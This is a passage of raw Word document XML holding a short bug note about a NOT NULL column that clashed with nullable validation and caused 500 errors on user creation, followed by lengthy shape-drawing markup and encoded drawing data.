        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> while every validation rule calls it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nullable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so creating a user without a second phone number returned 500. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AC11BB" w14:textId="69B47DE9"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Found by our own test suite.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It matters because before V-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that raw </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SQLSTATE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> reached the caller, and because creating staff accounts is now the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> way in since public registration was removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E30FC97" w14:textId="14329271" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00095011">
      <w:pPr>
        <w:spacing w:after="37" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>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6720" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23A59813" wp14:editId="15FA8458">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>15240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4486275" cy="752475"/>
                <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                <wp:wrapNone/>
                <wp:docPr id="30596" name="Group 30596"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4486275" cy="752475"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4486275" cy="752475"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2328" name="Shape 2328"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3381375" y="0"/>
                            <a:ext cx="1104900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1104900" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1095375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1098005" y="0"/>
                                  <a:pt x="1100250" y="930"/>
                                  <a:pt x="1102110" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1103970" y="4638"/>
                                  <a:pt x="1104900" y="6896"/>
                                  <a:pt x="1104900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1104900" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1104900" y="135967"/>
                                  <a:pt x="1103970" y="138212"/>
                                  <a:pt x="1102110" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1100250" y="141932"/>
                                  <a:pt x="1098005" y="142863"/>
                                  <a:pt x="1095375" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2789" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138212"/>
                                  <a:pt x="0" y="135967"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4638"/>
                                  <a:pt x="2789"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331" name="Shape 2331"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="1162050" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1162050" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1152525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1155155" y="0"/>
                                  <a:pt x="1157400" y="930"/>
                                  <a:pt x="1159260" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1161120" y="4638"/>
                                  <a:pt x="1162050" y="6896"/>
                                  <a:pt x="1162050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1162050" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1162050" y="135979"/>
                                  <a:pt x="1161120" y="138224"/>
                                  <a:pt x="1159260" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1157400" y="141945"/>
                                  <a:pt x="1155155" y="142875"/>
                                  <a:pt x="1152525" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133350"/>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336" name="Shape 2336"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2514600" y="438150"/>
                            <a:ext cx="695325" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690675" y="930"/>
                                  <a:pt x="692535" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4638"/>
                                  <a:pt x="695324" y="6896"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695324" y="126454"/>
                                  <a:pt x="694395" y="128687"/>
                                  <a:pt x="692535" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690675" y="132407"/>
                                  <a:pt x="688430" y="133338"/>
                                  <a:pt x="685800"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339" name="Shape 2339"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3743324" y="438150"/>
                            <a:ext cx="228600" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="228600" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="219075" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="221705" y="0"/>
                                  <a:pt x="223950" y="930"/>
                                  <a:pt x="225811" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="227670" y="4638"/>
                                  <a:pt x="228600" y="6896"/>
                                  <a:pt x="228600" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="228600" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="228600" y="126454"/>
                                  <a:pt x="227670" y="128687"/>
                                  <a:pt x="225811" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="223950" y="132407"/>
                                  <a:pt x="221705" y="133338"/>
                                  <a:pt x="219075"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345" name="Shape 2345"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1133475" y="609600"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="918"/>
                                  <a:pt x="282960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4638"/>
                                  <a:pt x="285750" y="6883"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135979"/>
                                  <a:pt x="284820" y="138212"/>
                                  <a:pt x="282960" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141932"/>
                                  <a:pt x="278855" y="142863"/>
                                  <a:pt x="276225"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348" name="Shape 2348"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2809874" y="609600"/>
                            <a:ext cx="933450" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="933450" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="926555" y="0"/>
                                  <a:pt x="928800" y="918"/>
                                  <a:pt x="930660" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="932520" y="4638"/>
                                  <a:pt x="933450" y="6883"/>
                                  <a:pt x="933450" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="933450" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="933450" y="135979"/>
                                  <a:pt x="932520" y="138212"/>
                                  <a:pt x="930660" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="928800" y="141932"/>
                                  <a:pt x="926555" y="142863"/>
                                  <a:pt x="923925"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5651810" id="Group 30596" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.2pt;margin-top:.35pt;width:353.25pt;height:59.25pt;z-index:-251509760;mso-width-relative:margin;mso-height-relative:margin" coordsize="44862,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BAUQcAAJ8sAAAOAAAAZHJzL2Uyb0RvYy54bWzsWttu20YQfS/QfxD0Xou7vAuxA7RO8lK0&#10;QZN+AE1RF4AiCZK27H59Z2c5y73QiuS6SRAoCGSJu7M7c+Zy9sI3bx/35eyhaLtdXV3P2ZU3nxVV&#10;Xq921eZ6/vfn978k81nXZ9UqK+uquJ4/Fd387c3PP705NMuC19u6XBXtDAapuuWhuZ5v+75ZLhZd&#10;vi32WXdVN0UFjeu63Wc9/Gw3i1WbHWD0fbngnhctDnW7ato6L7oOnt7KxvkNjr9eF3n/53rdFf2s&#10;vJ6Dbj1+tvh5Jz4XN2+y5abNmu0uH9TIXqDFPttVMKka6jbrs9l9u3OG2u/ytu7qdX+V1/tFvV7v&#10;8gJtAGuYZ1nzoa3vG7RlszxsGgUTQGvh9OJh8z8ePrTNp+ZjC0gcmg1ggb+ELY/rdi/+gpazR4Ts&#10;SUFWPPazHB4GQRLxOJzPcmiLQx7Ad8Q03wLwjli+fXdccEHTLgxlDg2ERzci0P03BD5ts6ZAYLsl&#10;IPCxne1W13Puc4jWKttDnGKPGT5BYLCfgqlbdoDYBEa+nzBfwOEixZgXpB7EoECKBTyRSCmDs2V+&#10;3/Ufihoxzx5+73oZnCv6lm3pW/5Y0dcWQvxocDdZL+SEsuLr7ACzkypbpYlo3tcPxecaO/bCc2nI&#10;NUtA0bFDWekdmZeGhtXQl3rk93e7/NfiH6t/4nna2KAazgiKeTwEjACi1B+yUzVxaMYmHseJiDKY&#10;xhze/KUE/TSWgkHko6A2n/QJzBclaSRDV8mpNkRiakKy0hVhvu+DJVKIuj2jn5qH+WEaxZYWSnvm&#10;J5xxq1WBwgLPi7H1VFgU1CxgqW8O7KXKQyJWI9+YVvO3EcmmfWS1BEdFkyFBfUxJKQEekTHiahBE&#10;Q5S4qvM4STFKzgRExJuIOxdlem77hp5rjjbNIOOkObK7FkrUbArpne2YJB3tOFY2n5UZCkQr1RTu&#10;RgIq/1FQm2rnZd0VMtpFmcHkVKUHI3IsbmUlqhDgkWdA+esy65E797se1gLlbg9O4LEHtZKyB0YT&#10;DCCLLn7rn8pCVKqy+qtYQ/VGfhIPunZz91vZzh4ywfj4DwfPymabDU+HcYeuqCqOI+TXu7JUQzIU&#10;NYZ8d/uev8dCAUYNnYVcgYsNJelJyXzQRq44gLfBaFp3gLwSwpnrqlfyFayWUE3NWvH1rl49IVcj&#10;IECJgrW/Cjf6zOZGeAIOEtMDh36ZG4d0iVkg6yKYP6wFGIu4JxL6e6DGQZXXokYGJGrR6LG8ZywM&#10;4T9WIiP9oCGGCo8NVr5CU8oj2XRWAQDcGeNS0C4pyieT1DiAJGhaWCfz1CwIZKWsZ/pwZ1DjOI+g&#10;xjgVM43kPWovijYPzNYRFMEECbaeSI0j1IJfgmFJS5aMHhqpbFRq9PfY6kxrgqNKqyFBfUxYpRKq&#10;RI8SpIGq6q7qPE6ls48AQrPqNDTpsKmOWjBQM/2V4ykNtDilHlN2KmOskFf2GzmicCTmMIe8UJTY&#10;DyuK+QEpKnIoCpn6ZIriIQuiocgGsJWziSqCfY4o5shT+gKftspfbQtHmgiakoqIwjhu0GS6OQkx&#10;dqCso3oSwnp/ZB0oWNTBzCHqngTDctlIwCj1omH3aydsykNf0pqW+ubY5q9hpjTwh12AzVAIQYA6&#10;2+tkQud0ftIkGAcyIU47ioKIBqkA41EQGvwTjYoz2D8lxq4uGtFgvhcG2OiQxDQeCmEGk3vmsIly&#10;iwgKc68bJcrFRj03ZyF7rfgxJKiPKUmRQXs2RwFVy13FFS2ciYYIMtyzOQjTc9st9FxzsWkGGSfN&#10;kd0naM0U0jvbsUg62uGrbD4rHxSIdn7RXtnIRyf/TbUvhPijEyKchJjnmT4uoU8mRD8OfKpxU4TI&#10;IfEEb3x7QiRNXokQOUs9/Rz3C4TIOYunDjQ5B/Yaioh5nsl5mDDYUgNFnVUAOI+jZ04zCYKJHZvW&#10;pBUzsxqYlU+TOJkQDRm78mqKu4SooXEmBWgIT/DK6BaXEDUXG/R2DBVVUA0JQs6UvBCiDPwLIYqL&#10;irK6HGKKI1tBPd/uEBOOcixClIc7JxMig8QXd5yibkdeKsgPj6ToKJMnYfx9nGSSJq90kAm0A0Ua&#10;7abTlWNlD24kkqljTA6kN2w0U2bcxfGEA5wvIMQkSJ45wyQIkBAT4wpLazqVEAfPwmAnF39tFvf8&#10;ko+Ku3dOGhpn3mNpCE9ejpFbxMmhea2nuXg8VnR2peR1SW8jIeo32tTnOCE6CqjNzZTi2tHlGdec&#10;tPtyEZah5rqFnv+ft3pmLJKOr71DNPPrcmRKF4WXW73xjZfAeeMFnpxzq8cTeFUgHo7hJggxBb78&#10;PgiRNHklQkxha3cGIcINXThFiClP6OTVIkQoC9FLCBFe5QifIUSCYIIQtaYTCVGTOJkQDRn7Qk9T&#10;3C3XGhpnEqKGsMsrmltcQtRcfCFEecvw5ZteyZ9aDB1bDMjOUXIhxMsOcdnJl3qe2SHiC6HwFiy+&#10;rjO8sStes9V/4xZ7fK/45l8AAAD//wMAUEsDBBQABgAIAAAAIQB21PB93QAAAAYBAAAPAAAAZHJz&#10;L2Rvd25yZXYueG1sTI5NS8NAFEX3gv9heII7O0n8aBszKaWoqyLYCuLuNXlNQjNvQmaapP/e50qX&#10;l3u492SrybZqoN43jg3EswgUceHKhisDn/vXuwUoH5BLbB2TgQt5WOXXVxmmpRv5g4ZdqJSMsE/R&#10;QB1Cl2rti5os+pnriKU7ut5ikNhXuuxxlHHb6iSKnrTFhuWhxo42NRWn3dkaeBtxXN/HL8P2dNxc&#10;vveP71/bmIy5vZnWz6ACTeEPhl99UYdcnA7uzKVXrYHkQUADc1BSzqPFEtRBqHiZgM4z/V8//wEA&#10;AP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRl&#10;bnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8B&#10;AABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBzUABAUQcAAJ8sAAAOAAAAAAAAAAAAAAAAAC4C&#10;AABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQB21PB93QAAAAYBAAAPAAAAAAAAAAAAAAAA&#10;AKsJAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAtQoAAAAA&#10;">
                <v:shape id="Shape 2328" o:spid="_x0000_s1027" style="position:absolute;left:33813;width:11049;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="11049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oGwAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4P/B/CE3abqVWmdEapgrKrVbbro3lrg81LSWLt/ntzGOz48f3e7EbbiYF8MI4VzGcZCOLaacON&#10;guvl+LYGESKyxs4xKfilALvt5GWDhXYPPtNQxUakEA4FKmhj7AspQ92SxTBzPXHifpy3GBP0jdQe&#10;HyncdjLPsndp0XBqaLGnQ0v1rbpbBYtwWq7Lc6y+jHP74btcmWbplXqdjuUHiEhj/Bf/uT+1gnyR&#10;p7npTXoCcvsEAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAshD6BsAAAADdAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m9525,l1095375,v2630,,4875,930,6735,2778c1103970,4638,1104900,6896,1104900,9525r,123825c1104900,135967,1103970,138212,1102110,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6736,-2803c930,138212,,135967,,133350l,9525c,6896,930,4638,2789,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1104900,142875"/>
                </v:shape>
                <v:shape id="Shape 2331" o:spid="_x0000_s1028" style="position:absolute;top:1714;width:11620;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="11620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QxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvwn6H8Ba8iKYqyFKNsiws/rmIuge9PZq3abF5qU3U6qc3guBxmJnfMJNZY0txodoXjhX0ewkI&#10;4szpgo2Cv91v9wuED8gaS8ek4EYeZtOP1gRT7a68ocs2GBEh7FNUkIdQpVL6LCeLvucq4uj9u9pi&#10;iLI2Utd4jXBbykGSjKTFguNCjhX95JQdt2er4GDnJ3+7r1ebpekYG+6LU3bcK9X+bL7HIAI14R1+&#10;tRdawWA47MPzTXwCcvoAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA8kv1EMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l1152525,v2630,,4875,930,6735,2778c1161120,4638,1162050,6896,1162050,9525r,123825c1162050,135979,1161120,138224,1159260,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791l,133350,,9525,2790,2778c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1162050,142875"/>
                </v:shape>
                <v:shape id="Shape 2336" o:spid="_x0000_s1029" style="position:absolute;left:25146;top:4381;width:6953;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="69532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1/txwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8oTedNcIVqKrlEKhFoJoPejtkX0msdm3Ibtq0l/fFQo9DjPzDbNcd7YWN2p95VjDZKxA&#10;EOfOVFxoOHy9j+YgfEA2WDsmDT15WK+eBktMjbvzjm77UIgIYZ+ihjKEJpXS5yVZ9GPXEEfv7FqL&#10;Icq2kKbFe4TbWiZKzaTFiuNCiQ29lZR/769Ww/agXvrL0fw0n7s6yzJ1Snq10fp52L0uQATqwn/4&#10;r/1hNCTT6Qweb+ITkKtfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADXnX+3HAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m9525,l685800,v2630,,4875,930,6735,2778c694395,4638,695324,6896,695325,9525r,114300c695324,126454,694395,128687,692535,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126454,,123825l,9525c,6896,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,695325,133350"/>
                </v:shape>
                <v:shape id="Shape 2339" o:spid="_x0000_s1030" style="position:absolute;left:37433;top:4381;width:2286;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2286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KUfxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RisIw&#10;FETfBf8hXME3Ta2waDWKCK7KsoLVD7g017bY3JQma6tfv1lY8HGYmTPMct2ZSjyocaVlBZNxBII4&#10;s7rkXMH1shvNQDiPrLGyTAqe5GC96veWmGjb8pkeqc9FgLBLUEHhfZ1I6bKCDLqxrYmDd7ONQR9k&#10;k0vdYBvgppJxFH1IgyWHhQJr2haU3dMfo2D+dUyPbX2/xK/TfuauG//5nHwrNRx0mwUIT51/h//b&#10;B60gnk7n8PcmPAG5+gUAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCfuKUfxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l219075,v2630,,4875,930,6736,2778c227670,4638,228600,6896,228600,9525r,114300c228600,126454,227670,128687,225811,130547v-1861,1860,-4106,2791,-6736,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126454,,123825l,9525c,6896,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,228600,133350"/>
                </v:shape>
